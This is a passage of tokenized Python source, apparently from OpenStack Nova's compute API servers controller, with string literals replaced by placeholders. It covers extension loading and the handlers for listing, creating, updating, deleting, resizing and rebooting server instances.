base_rebuild <EOL> schema_server_resize = schema_servers . base_resize <EOL> schema_server_create_v20 = schema_servers . base_create_v20 <EOL> schema_server_update_v20 = schema_servers . base_update_v20 <EOL> schema_server_rebuild_v20 = schema_servers . base_rebuild_v20 <EOL> schema_server_create_v219 = schema_servers . base_create_v219 <EOL> schema_server_update_v219 = schema_servers . base_update_v219 <EOL> schema_server_rebuild_v219 = schema_servers . base_rebuild_v219 <EOL> @ staticmethod <EOL> def _add_location ( robj ) : <EOL> if '<STR_LIT>' not in robj . obj : <EOL> return robj <EOL> link = [ l for l in robj . obj [ '<STR_LIT>' ] [ '<STR_LIT>' ] if l [ '<STR_LIT>' ] == '<STR_LIT>' ] <EOL> if link : <EOL> robj [ '<STR_LIT>' ] = utils . utf8 ( link [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> return robj <EOL> def __init__ ( self , ** kwargs ) : <EOL> def _check_load_extension ( required_function ) : <EOL> def should_load_extension ( ext ) : <EOL> whitelist = CONF . osapi_v21 . extensions_whitelist <EOL> blacklist = CONF . osapi_v21 . extensions_blacklist <EOL> if not whitelist : <EOL> if ext . obj . alias in blacklist : <EOL> return False <EOL> else : <EOL> return True <EOL> else : <EOL> if ext . obj . alias in whitelist : <EOL> if ext . obj . alias in blacklist : <EOL> LOG . warning ( <EOL> _LW ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) , <EOL> ext . obj . alias ) <EOL> return False <EOL> else : <EOL> return True <EOL> else : <EOL> return False <EOL> def check_load_extension ( ext ) : <EOL> if isinstance ( ext . obj , extensions . V21APIExtensionBase ) : <EOL> if hasattr ( ext . obj , required_function ) : <EOL> LOG . debug ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT>' : ext . obj . alias , <EOL> '<STR_LIT>' : required_function } ) <EOL> return should_load_extension ( ext ) <EOL> else : <EOL> LOG . debug ( <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT>' : ext . obj . 
alias , <EOL> '<STR_LIT>' : required_function } ) <EOL> return False <EOL> else : <EOL> return False <EOL> return check_load_extension <EOL> self . extension_info = kwargs . pop ( '<STR_LIT>' ) <EOL> super ( ServersController , self ) . __init__ ( ** kwargs ) <EOL> self . compute_api = compute . API ( skip_policy_check = True ) <EOL> self . create_extension_manager = stevedore . enabled . EnabledExtensionManager ( <EOL> namespace = self . EXTENSION_CREATE_NAMESPACE , <EOL> check_func = _check_load_extension ( '<STR_LIT>' ) , <EOL> invoke_on_load = True , <EOL> invoke_kwds = { "<STR_LIT>" : self . extension_info } , <EOL> propagate_map_exceptions = True ) <EOL> if not list ( self . create_extension_manager ) : <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> self . rebuild_extension_manager = stevedore . enabled . EnabledExtensionManager ( <EOL> namespace = self . EXTENSION_REBUILD_NAMESPACE , <EOL> check_func = _check_load_extension ( '<STR_LIT>' ) , <EOL> invoke_on_load = True , <EOL> invoke_kwds = { "<STR_LIT>" : self . extension_info } , <EOL> propagate_map_exceptions = True ) <EOL> if not list ( self . rebuild_extension_manager ) : <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> self . update_extension_manager = stevedore . enabled . EnabledExtensionManager ( <EOL> namespace = self . EXTENSION_UPDATE_NAMESPACE , <EOL> check_func = _check_load_extension ( '<STR_LIT>' ) , <EOL> invoke_on_load = True , <EOL> invoke_kwds = { "<STR_LIT>" : self . extension_info } , <EOL> propagate_map_exceptions = True ) <EOL> if not list ( self . update_extension_manager ) : <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> self . resize_extension_manager = stevedore . enabled . EnabledExtensionManager ( <EOL> namespace = self . EXTENSION_RESIZE_NAMESPACE , <EOL> check_func = _check_load_extension ( '<STR_LIT>' ) , <EOL> invoke_on_load = True , <EOL> invoke_kwds = { "<STR_LIT>" : self . extension_info } , <EOL> propagate_map_exceptions = True ) <EOL> if not list ( self . 
resize_extension_manager ) : <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> self . create_schema_manager = stevedore . enabled . EnabledExtensionManager ( <EOL> namespace = self . EXTENSION_CREATE_NAMESPACE , <EOL> check_func = _check_load_extension ( '<STR_LIT>' ) , <EOL> invoke_on_load = True , <EOL> invoke_kwds = { "<STR_LIT>" : self . extension_info } , <EOL> propagate_map_exceptions = True ) <EOL> if list ( self . create_schema_manager ) : <EOL> self . create_schema_manager . map ( self . _create_extension_schema , <EOL> self . schema_server_create_v219 , <EOL> '<STR_LIT>' ) <EOL> self . create_schema_manager . map ( self . _create_extension_schema , <EOL> self . schema_server_create , '<STR_LIT>' ) <EOL> self . create_schema_manager . map ( self . _create_extension_schema , <EOL> self . schema_server_create_v20 , <EOL> '<STR_LIT>' ) <EOL> else : <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> self . update_schema_manager = stevedore . enabled . EnabledExtensionManager ( <EOL> namespace = self . EXTENSION_UPDATE_NAMESPACE , <EOL> check_func = _check_load_extension ( '<STR_LIT>' ) , <EOL> invoke_on_load = True , <EOL> invoke_kwds = { "<STR_LIT>" : self . extension_info } , <EOL> propagate_map_exceptions = True ) <EOL> if list ( self . update_schema_manager ) : <EOL> self . update_schema_manager . map ( self . _update_extension_schema , <EOL> self . schema_server_update_v219 , <EOL> '<STR_LIT>' ) <EOL> self . update_schema_manager . map ( self . _update_extension_schema , <EOL> self . schema_server_update , '<STR_LIT>' ) <EOL> self . update_schema_manager . map ( self . _update_extension_schema , <EOL> self . schema_server_update_v20 , <EOL> '<STR_LIT>' ) <EOL> else : <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> self . rebuild_schema_manager = stevedore . enabled . EnabledExtensionManager ( <EOL> namespace = self . EXTENSION_REBUILD_NAMESPACE , <EOL> check_func = _check_load_extension ( '<STR_LIT>' ) , <EOL> invoke_on_load = True , <EOL> invoke_kwds = { "<STR_LIT>" : self . 
extension_info } , <EOL> propagate_map_exceptions = True ) <EOL> if list ( self . rebuild_schema_manager ) : <EOL> self . rebuild_schema_manager . map ( self . _rebuild_extension_schema , <EOL> self . schema_server_rebuild_v219 , <EOL> '<STR_LIT>' ) <EOL> self . rebuild_schema_manager . map ( self . _rebuild_extension_schema , <EOL> self . schema_server_rebuild , '<STR_LIT>' ) <EOL> self . rebuild_schema_manager . map ( self . _rebuild_extension_schema , <EOL> self . schema_server_rebuild_v20 , <EOL> '<STR_LIT>' ) <EOL> else : <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> self . resize_schema_manager = stevedore . enabled . EnabledExtensionManager ( <EOL> namespace = self . EXTENSION_RESIZE_NAMESPACE , <EOL> check_func = _check_load_extension ( '<STR_LIT>' ) , <EOL> invoke_on_load = True , <EOL> invoke_kwds = { "<STR_LIT>" : self . extension_info } , <EOL> propagate_map_exceptions = True ) <EOL> if list ( self . resize_schema_manager ) : <EOL> self . resize_schema_manager . map ( self . _resize_extension_schema , <EOL> self . schema_server_resize , '<STR_LIT>' ) <EOL> else : <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> @ extensions . expected_errors ( ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> def index ( self , req ) : <EOL> """<STR_LIT>""" <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> authorize ( context , action = "<STR_LIT:index>" ) <EOL> try : <EOL> servers = self . _get_servers ( req , is_detail = False ) <EOL> except exception . Invalid as err : <EOL> raise exc . HTTPBadRequest ( explanation = err . format_message ( ) ) <EOL> return servers <EOL> @ extensions . expected_errors ( ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> def detail ( self , req ) : <EOL> """<STR_LIT>""" <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> authorize ( context , action = "<STR_LIT>" ) <EOL> try : <EOL> servers = self . _get_servers ( req , is_detail = True ) <EOL> except exception . Invalid as err : <EOL> raise exc . HTTPBadRequest ( explanation = err . 
format_message ( ) ) <EOL> return servers <EOL> def _get_servers ( self , req , is_detail ) : <EOL> """<STR_LIT>""" <EOL> search_opts = { } <EOL> search_opts . update ( req . GET ) <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> remove_invalid_options ( context , search_opts , <EOL> self . _get_server_search_options ( req ) ) <EOL> search_opts . pop ( '<STR_LIT:status>' , None ) <EOL> if '<STR_LIT:status>' in req . GET . keys ( ) : <EOL> statuses = req . GET . getall ( '<STR_LIT:status>' ) <EOL> states = common . task_and_vm_state_from_status ( statuses ) <EOL> vm_state , task_state = states <EOL> if not vm_state and not task_state : <EOL> return { '<STR_LIT>' : [ ] } <EOL> search_opts [ '<STR_LIT>' ] = vm_state <EOL> if '<STR_LIT:default>' not in task_state : <EOL> search_opts [ '<STR_LIT>' ] = task_state <EOL> if '<STR_LIT>' in search_opts : <EOL> try : <EOL> parsed = timeutils . parse_isotime ( search_opts [ '<STR_LIT>' ] ) <EOL> except ValueError : <EOL> msg = _ ( '<STR_LIT>' ) <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> search_opts [ '<STR_LIT>' ] = parsed <EOL> if '<STR_LIT>' not in search_opts : <EOL> if '<STR_LIT>' not in search_opts : <EOL> search_opts [ '<STR_LIT>' ] = False <EOL> else : <EOL> search_opts [ '<STR_LIT>' ] = strutils . bool_from_string ( <EOL> search_opts [ '<STR_LIT>' ] , default = False ) <EOL> if search_opts . get ( "<STR_LIT>" ) == [ '<STR_LIT>' ] : <EOL> if context . is_admin : <EOL> search_opts [ '<STR_LIT>' ] = True <EOL> else : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPForbidden ( explanation = msg ) <EOL> all_tenants = common . is_all_tenants ( search_opts ) <EOL> search_opts . pop ( '<STR_LIT>' , None ) <EOL> elevated = None <EOL> if all_tenants : <EOL> if is_detail : <EOL> authorize ( context , action = "<STR_LIT>" ) <EOL> else : <EOL> authorize ( context , action = "<STR_LIT>" ) <EOL> elevated = context . elevated ( ) <EOL> else : <EOL> if context . 
project_id : <EOL> search_opts [ '<STR_LIT>' ] = context . project_id <EOL> else : <EOL> search_opts [ '<STR_LIT>' ] = context . user_id <EOL> limit , marker = common . get_limit_and_marker ( req ) <EOL> sort_keys , sort_dirs = common . get_sort_params ( req . params ) <EOL> expected_attrs = [ '<STR_LIT>' ] <EOL> if is_detail : <EOL> expected_attrs = self . _view_builder . get_show_expected_attrs ( <EOL> expected_attrs ) <EOL> try : <EOL> instance_list = self . compute_api . get_all ( elevated or context , <EOL> search_opts = search_opts , limit = limit , marker = marker , <EOL> want_objects = True , expected_attrs = expected_attrs , <EOL> sort_keys = sort_keys , sort_dirs = sort_dirs ) <EOL> except exception . MarkerNotFound : <EOL> msg = _ ( '<STR_LIT>' ) % marker <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> except exception . FlavorNotFound : <EOL> LOG . debug ( "<STR_LIT>" , <EOL> search_opts [ '<STR_LIT>' ] ) <EOL> instance_list = objects . InstanceList ( ) <EOL> if is_detail : <EOL> instance_list . _context = context <EOL> instance_list . fill_faults ( ) <EOL> response = self . _view_builder . detail ( req , instance_list ) <EOL> else : <EOL> response = self . _view_builder . index ( req , instance_list ) <EOL> req . cache_db_instances ( instance_list ) <EOL> return response <EOL> def _get_server ( self , context , req , instance_uuid , is_detail = False ) : <EOL> """<STR_LIT>""" <EOL> expected_attrs = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> if is_detail : <EOL> expected_attrs = self . _view_builder . get_show_expected_attrs ( <EOL> expected_attrs ) <EOL> instance = common . get_instance ( self . compute_api , context , <EOL> instance_uuid , <EOL> expected_attrs = expected_attrs ) <EOL> req . 
cache_db_instance ( instance ) <EOL> return instance <EOL> def _get_requested_networks ( self , requested_networks ) : <EOL> """<STR_LIT>""" <EOL> networks = [ ] <EOL> network_uuids = [ ] <EOL> for network in requested_networks : <EOL> request = objects . NetworkRequest ( ) <EOL> try : <EOL> request . address = network . get ( '<STR_LIT>' , None ) <EOL> request . port_id = network . get ( '<STR_LIT:port>' , None ) <EOL> if request . port_id : <EOL> request . network_id = None <EOL> if not utils . is_neutron ( ) : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> if request . address is not None : <EOL> msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) % { <EOL> "<STR_LIT>" : request . address , <EOL> "<STR_LIT:port>" : request . port_id } <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> else : <EOL> request . network_id = network [ '<STR_LIT>' ] <EOL> if ( not request . port_id and <EOL> not uuidutils . is_uuid_like ( request . network_id ) ) : <EOL> br_uuid = request . network_id . split ( '<STR_LIT:->' , <NUM_LIT:1> ) [ - <NUM_LIT:1> ] <EOL> if not uuidutils . is_uuid_like ( br_uuid ) : <EOL> msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) % request . network_id <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> if ( not utils . is_neutron ( ) and request . network_id and <EOL> request . network_id in network_uuids ) : <EOL> expl = ( _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % <EOL> request . network_id ) <EOL> raise exc . HTTPBadRequest ( explanation = expl ) <EOL> network_uuids . append ( request . network_id ) <EOL> networks . append ( request ) <EOL> except KeyError as key : <EOL> expl = _ ( '<STR_LIT>' ) % key <EOL> raise exc . HTTPBadRequest ( explanation = expl ) <EOL> except TypeError : <EOL> expl = _ ( '<STR_LIT>' ) <EOL> raise exc . HTTPBadRequest ( explanation = expl ) <EOL> return objects . NetworkRequestList ( objects = networks ) <EOL> B64_REGEX = re . 
compile ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def _decode_base64 ( self , data ) : <EOL> data = re . sub ( r'<STR_LIT>' , '<STR_LIT>' , data ) <EOL> if not self . B64_REGEX . match ( data ) : <EOL> return None <EOL> try : <EOL> return base64 . b64decode ( data ) <EOL> except TypeError : <EOL> return None <EOL> @ extensions . expected_errors ( <NUM_LIT> ) <EOL> def show ( self , req , id ) : <EOL> """<STR_LIT>""" <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> authorize ( context , action = "<STR_LIT>" ) <EOL> instance = self . _get_server ( context , req , id , is_detail = True ) <EOL> return self . _view_builder . show ( req , instance ) <EOL> @ wsgi . response ( <NUM_LIT> ) <EOL> @ extensions . expected_errors ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> @ validation . schema ( schema_server_create_v20 , '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ validation . schema ( schema_server_create , '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ validation . schema ( schema_server_create_v219 , '<STR_LIT>' ) <EOL> def create ( self , req , body ) : <EOL> """<STR_LIT>""" <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> server_dict = body [ '<STR_LIT>' ] <EOL> password = self . _get_server_admin_password ( server_dict ) <EOL> name = common . normalize_name ( server_dict [ '<STR_LIT:name>' ] ) <EOL> if api_version_request . is_supported ( req , min_version = '<STR_LIT>' ) : <EOL> if '<STR_LIT:description>' in server_dict : <EOL> description = server_dict [ '<STR_LIT:description>' ] <EOL> else : <EOL> description = None <EOL> else : <EOL> description = name <EOL> create_kwargs = { } <EOL> if list ( self . create_extension_manager ) : <EOL> self . create_extension_manager . map ( self . _create_extension_point , <EOL> server_dict , create_kwargs , body ) <EOL> availability_zone = create_kwargs . pop ( "<STR_LIT>" , None ) <EOL> target = { <EOL> '<STR_LIT>' : context . project_id , <EOL> '<STR_LIT>' : context . 
user_id , <EOL> '<STR_LIT>' : availability_zone } <EOL> authorize ( context , target , '<STR_LIT>' ) <EOL> parse_az = self . compute_api . parse_availability_zone <EOL> availability_zone , host , node = parse_az ( context , availability_zone ) <EOL> if host or node : <EOL> authorize ( context , { } , '<STR_LIT>' ) <EOL> block_device_mapping = create_kwargs . get ( "<STR_LIT>" ) <EOL> if block_device_mapping : <EOL> authorize ( context , target , '<STR_LIT>' ) <EOL> image_uuid = self . _image_from_req_data ( server_dict , create_kwargs ) <EOL> return_reservation_id = create_kwargs . pop ( '<STR_LIT>' , <EOL> False ) <EOL> requested_networks = None <EOL> if ( '<STR_LIT>' in self . extension_info . get_extensions ( ) <EOL> or utils . is_neutron ( ) ) : <EOL> requested_networks = server_dict . get ( '<STR_LIT>' ) <EOL> if requested_networks is not None : <EOL> requested_networks = self . _get_requested_networks ( <EOL> requested_networks ) <EOL> if requested_networks and len ( requested_networks ) : <EOL> authorize ( context , target , '<STR_LIT>' ) <EOL> try : <EOL> flavor_id = self . _flavor_id_from_req_data ( body ) <EOL> except ValueError : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> try : <EOL> inst_type = flavors . get_flavor_by_flavor_id ( <EOL> flavor_id , ctxt = context , read_deleted = "<STR_LIT>" ) <EOL> ( instances , resv_id ) = self . compute_api . create ( context , <EOL> inst_type , <EOL> image_uuid , <EOL> display_name = name , <EOL> display_description = description , <EOL> availability_zone = availability_zone , <EOL> forced_host = host , forced_node = node , <EOL> metadata = server_dict . get ( '<STR_LIT>' , { } ) , <EOL> admin_password = password , <EOL> requested_networks = requested_networks , <EOL> check_server_group_quota = True , <EOL> ** create_kwargs ) <EOL> except ( exception . QuotaError , <EOL> exception . PortLimitExceeded ) as error : <EOL> raise exc . 
HTTPForbidden ( <EOL> explanation = error . format_message ( ) ) <EOL> except exception . ImageNotFound : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> except exception . FlavorNotFound : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> except exception . KeypairNotFound : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> except exception . ConfigDriveInvalidValue : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> except exception . ExternalNetworkAttachForbidden as error : <EOL> raise exc . HTTPForbidden ( explanation = error . format_message ( ) ) <EOL> except messaging . RemoteError as err : <EOL> msg = "<STR_LIT>" % { '<STR_LIT>' : err . exc_type , <EOL> '<STR_LIT>' : err . value } <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> except UnicodeDecodeError as error : <EOL> msg = "<STR_LIT>" % error <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> except ( exception . ImageNotActive , <EOL> exception . ImageBadRequest , <EOL> exception . FixedIpNotFoundForAddress , <EOL> exception . FlavorDiskTooSmall , <EOL> exception . FlavorMemoryTooSmall , <EOL> exception . InvalidMetadata , <EOL> exception . InvalidRequest , <EOL> exception . InvalidVolume , <EOL> exception . MultiplePortsNotApplicable , <EOL> exception . InvalidFixedIpAndMaxCountRequest , <EOL> exception . InstanceUserDataMalformed , <EOL> exception . InstanceUserDataTooLarge , <EOL> exception . PortNotFound , <EOL> exception . FixedIpAlreadyInUse , <EOL> exception . SecurityGroupNotFound , <EOL> exception . PortRequiresFixedIP , <EOL> exception . NetworkRequiresSubnet , <EOL> exception . NetworkNotFound , <EOL> exception . NetworkDuplicated , <EOL> exception . InvalidBDM , <EOL> exception . InvalidBDMSnapshot , <EOL> exception . InvalidBDMVolume , <EOL> exception . InvalidBDMImage , <EOL> exception . 
InvalidBDMBootSequence , <EOL> exception . InvalidBDMLocalsLimit , <EOL> exception . InvalidBDMVolumeNotBootable , <EOL> exception . InvalidBDMEphemeralSize , <EOL> exception . InvalidBDMFormat , <EOL> exception . InvalidBDMSwapSize , <EOL> exception . AutoDiskConfigDisabledByImage , <EOL> exception . ImageNUMATopologyIncomplete , <EOL> exception . ImageNUMATopologyForbidden , <EOL> exception . ImageNUMATopologyAsymmetric , <EOL> exception . ImageNUMATopologyCPUOutOfRange , <EOL> exception . ImageNUMATopologyCPUDuplicates , <EOL> exception . ImageNUMATopologyCPUsUnassigned , <EOL> exception . ImageNUMATopologyMemoryOutOfRange , <EOL> exception . InstanceGroupNotFound ) as error : <EOL> raise exc . HTTPBadRequest ( explanation = error . format_message ( ) ) <EOL> except ( exception . PortInUse , <EOL> exception . InstanceExists , <EOL> exception . NetworkAmbiguous , <EOL> exception . NoUniqueMatch ) as error : <EOL> raise exc . HTTPConflict ( explanation = error . format_message ( ) ) <EOL> if return_reservation_id : <EOL> return wsgi . ResponseObject ( { '<STR_LIT>' : resv_id } ) <EOL> req . cache_db_instances ( instances ) <EOL> server = self . _view_builder . create ( req , instances [ <NUM_LIT:0> ] ) <EOL> if CONF . enable_instance_password : <EOL> server [ '<STR_LIT>' ] [ '<STR_LIT>' ] = password <EOL> robj = wsgi . ResponseObject ( server ) <EOL> return self . _add_location ( robj ) <EOL> def _create_extension_point ( self , ext , server_dict , <EOL> create_kwargs , req_body ) : <EOL> handler = ext . obj <EOL> LOG . debug ( "<STR_LIT>" , ext . obj ) <EOL> handler . server_create ( server_dict , create_kwargs , req_body ) <EOL> def _rebuild_extension_point ( self , ext , rebuild_dict , rebuild_kwargs ) : <EOL> handler = ext . obj <EOL> LOG . debug ( "<STR_LIT>" , ext . obj ) <EOL> handler . server_rebuild ( rebuild_dict , rebuild_kwargs ) <EOL> def _resize_extension_point ( self , ext , resize_dict , resize_kwargs ) : <EOL> handler = ext . obj <EOL> LOG . 
debug ( "<STR_LIT>" , ext . obj ) <EOL> handler . server_resize ( resize_dict , resize_kwargs ) <EOL> def _update_extension_point ( self , ext , update_dict , update_kwargs ) : <EOL> handler = ext . obj <EOL> LOG . debug ( "<STR_LIT>" , ext . obj ) <EOL> handler . server_update ( update_dict , update_kwargs ) <EOL> def _create_extension_schema ( self , ext , create_schema , version ) : <EOL> handler = ext . obj <EOL> LOG . debug ( "<STR_LIT>" , ext . obj ) <EOL> schema = handler . get_server_create_schema ( version ) <EOL> if ext . obj . name == '<STR_LIT>' : <EOL> create_schema [ '<STR_LIT>' ] . update ( schema ) <EOL> else : <EOL> create_schema [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] . update ( schema ) <EOL> def _update_extension_schema ( self , ext , update_schema , version ) : <EOL> handler = ext . obj <EOL> LOG . debug ( "<STR_LIT>" , ext . obj ) <EOL> schema = handler . get_server_update_schema ( version ) <EOL> update_schema [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] . update ( schema ) <EOL> def _rebuild_extension_schema ( self , ext , rebuild_schema , version ) : <EOL> handler = ext . obj <EOL> LOG . debug ( "<STR_LIT>" , ext . obj ) <EOL> schema = handler . get_server_rebuild_schema ( version ) <EOL> rebuild_schema [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] . update ( schema ) <EOL> def _resize_extension_schema ( self , ext , resize_schema , version ) : <EOL> handler = ext . obj <EOL> LOG . debug ( "<STR_LIT>" , ext . obj ) <EOL> schema = handler . get_server_resize_schema ( version ) <EOL> resize_schema [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] . update ( schema ) <EOL> def _delete ( self , context , req , instance_uuid ) : <EOL> authorize ( context , action = '<STR_LIT>' ) <EOL> instance = self . _get_server ( context , req , instance_uuid ) <EOL> if CONF . reclaim_instance_interval : <EOL> try : <EOL> self . compute_api . soft_delete ( context , instance ) <EOL> except exception . InstanceInvalidState : <EOL> self . 
compute_api . delete ( context , instance ) <EOL> else : <EOL> self . compute_api . delete ( context , instance ) <EOL> @ extensions . expected_errors ( ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> @ validation . schema ( schema_server_update_v20 , '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ validation . schema ( schema_server_update , '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ validation . schema ( schema_server_update_v219 , '<STR_LIT>' ) <EOL> def update ( self , req , id , body ) : <EOL> """<STR_LIT>""" <EOL> ctxt = req . environ [ '<STR_LIT>' ] <EOL> update_dict = { } <EOL> authorize ( ctxt , action = '<STR_LIT>' ) <EOL> if '<STR_LIT:name>' in body [ '<STR_LIT>' ] : <EOL> update_dict [ '<STR_LIT>' ] = common . normalize_name ( <EOL> body [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] ) <EOL> if '<STR_LIT:description>' in body [ '<STR_LIT>' ] : <EOL> update_dict [ '<STR_LIT>' ] = body [ '<STR_LIT>' ] [ '<STR_LIT:description>' ] <EOL> if list ( self . update_extension_manager ) : <EOL> self . update_extension_manager . map ( self . _update_extension_point , <EOL> body [ '<STR_LIT>' ] , update_dict ) <EOL> instance = self . _get_server ( ctxt , req , id , is_detail = True ) <EOL> try : <EOL> instance . update ( update_dict ) <EOL> instance . save ( ) <EOL> return self . _view_builder . show ( req , instance , <EOL> extend_address = False ) <EOL> except exception . InstanceNotFound : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPNotFound ( explanation = msg ) <EOL> @ wsgi . response ( <NUM_LIT> ) <EOL> @ extensions . expected_errors ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> @ wsgi . action ( '<STR_LIT>' ) <EOL> def _action_confirm_resize ( self , req , id , body ) : <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> authorize ( context , action = '<STR_LIT>' ) <EOL> instance = self . _get_server ( context , req , id ) <EOL> try : <EOL> self . compute_api . confirm_resize ( context , instance ) <EOL> except exception . InstanceUnknownCell as e : <EOL> raise exc . 
HTTPNotFound ( explanation = e . format_message ( ) ) <EOL> except exception . MigrationNotFound : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> except exception . InstanceIsLocked as e : <EOL> raise exc . HTTPConflict ( explanation = e . format_message ( ) ) <EOL> except exception . InstanceInvalidState as state_error : <EOL> common . raise_http_conflict_for_instance_invalid_state ( state_error , <EOL> '<STR_LIT>' , id ) <EOL> @ wsgi . response ( <NUM_LIT> ) <EOL> @ extensions . expected_errors ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> @ wsgi . action ( '<STR_LIT>' ) <EOL> def _action_revert_resize ( self , req , id , body ) : <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> authorize ( context , action = '<STR_LIT>' ) <EOL> instance = self . _get_server ( context , req , id ) <EOL> try : <EOL> self . compute_api . revert_resize ( context , instance ) <EOL> except exception . InstanceUnknownCell as e : <EOL> raise exc . HTTPNotFound ( explanation = e . format_message ( ) ) <EOL> except exception . MigrationNotFound : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> except exception . FlavorNotFound : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> except exception . InstanceIsLocked as e : <EOL> raise exc . HTTPConflict ( explanation = e . format_message ( ) ) <EOL> except exception . InstanceInvalidState as state_error : <EOL> common . raise_http_conflict_for_instance_invalid_state ( state_error , <EOL> '<STR_LIT>' , id ) <EOL> @ wsgi . response ( <NUM_LIT> ) <EOL> @ extensions . expected_errors ( ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> @ wsgi . action ( '<STR_LIT>' ) <EOL> @ validation . schema ( schema_servers . reboot ) <EOL> def _action_reboot ( self , req , id , body ) : <EOL> reboot_type = body [ '<STR_LIT>' ] [ '<STR_LIT:type>' ] . upper ( ) <EOL> context = req . 
environ [ '<STR_LIT>' ] <EOL> authorize ( context , action = '<STR_LIT>' ) <EOL> instance = self . _get_server ( context , req , id ) <EOL> try : <EOL> self . compute_api . reboot ( context , instance , reboot_type ) <EOL> except exception . InstanceIsLocked as e : <EOL> raise exc . HTTPConflict ( explanation = e . format_message ( ) ) <EOL> except exception . InstanceInvalidState as state_error : <EOL> common . raise_http_conflict_for_instance_invalid_state ( state_error , <EOL> '<STR_LIT>' , id ) <EOL> def _resize ( self , req , instance_id , flavor_id , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> context = req . environ [ "<STR_LIT>" ] <EOL> authorize ( context , action = '<STR_LIT>' ) <EOL> instance = self . _get_server ( context , req , instance_id ) <EOL> try : <EOL> self . compute_api . resize ( context , instance , flavor_id , ** kwargs ) <EOL> except exception . InstanceUnknownCell as e : <EOL> raise exc . HTTPNotFound ( explanation = e . format_message ( ) ) <EOL> except exception . QuotaError as error : <EOL> raise exc . HTTPForbidden ( <EOL> explanation = error . format_message ( ) ) <EOL> except exception . InstanceIsLocked as e : <EOL> raise exc . HTTPConflict ( explanation = e . format_message ( ) ) <EOL> except exception . InstanceInvalidState as state_error : <EOL> common . raise_http_conflict_for_instance_invalid_state ( state_error , <EOL> '<STR_LIT>' , instance_id ) <EOL> except exception . ImageNotAuthorized : <EOL> msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> raise exc . HTTPUnauthorized ( explanation = msg ) <EOL> except exception . ImageNotFound : <EOL> msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> except ( exception . AutoDiskConfigDisabledByImage , <EOL> exception . CannotResizeDisk , <EOL> exception . CannotResizeToSameFlavor , <EOL> exception . FlavorNotFound , <EOL> exception . NoValidHost ) as e : <EOL> raise exc . HTTPBadRequest ( explanation = e . 
